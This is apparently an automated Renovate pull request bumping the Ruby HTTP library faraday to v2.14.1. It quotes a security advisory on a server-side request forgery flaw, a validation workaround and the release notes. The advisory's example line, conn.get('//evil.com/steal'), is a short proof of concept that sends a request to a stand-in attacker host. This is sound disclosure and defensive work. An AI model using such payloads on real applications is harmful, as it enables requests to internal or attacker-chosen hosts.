Update dependency faraday to v2.14.1 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
faraday (source, changelog)	2.13.3 → 2.14.1

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2026-25765

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #​1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

---

Release Notes

lostisland/faraday (faraday)

v2.14.1

Compare Source

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

• Add comprehensive AI agent guidelines for Claude, Cursor, and GitHub Copilot by @​Copilot in #​1642
• Add RFC document for Options architecture refactoring plan by @​Copilot in #​1644
• Bump actions/checkout from 5 to 6 by @​dependabot[bot] in #​1655
• Explicit top-level namespace reference by @​c960657 in #​1657

New Contributors

• @​Copilot made their first contribution in #​1642

Full Changelog: lostisland/faraday@v2.14.0...v2.14.1

v2.14.0

Compare Source

What's Changed

New features ✨

• Use newer UnprocessableContent naming for 422 by @​tylerhunt in #​1638

Fixes 🐞

• Convert strings to UTF-8 by @​c960657 in #​1624
• Fix Response#to_hash when response not finished yet by @​yykamei in #​1639

Misc/Docs 📄

• Lint: use filter_map by @​olleolleolle in #​1637
• Bump actions/checkout from v4 to v5 by @​dependabot[bot] in #​1636
• Fixes documentation by @​dharamgollapudi in #​1635

New Contributors

• @​c960657 made their first contribution in #​1624
• @​dharamgollapudi made their first contribution in #​1635
• @​tylerhunt made their first contribution in #​1638

Full Changelog: lostisland/faraday@v2.13.4...v2.14.0

v2.13.4

Compare Source

What's Changed

• Improve error handling logic and add missing test coverage by @​iMacTia in #​1633

Full Changelog: lostisland/faraday@v2.13.3...v2.13.4

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.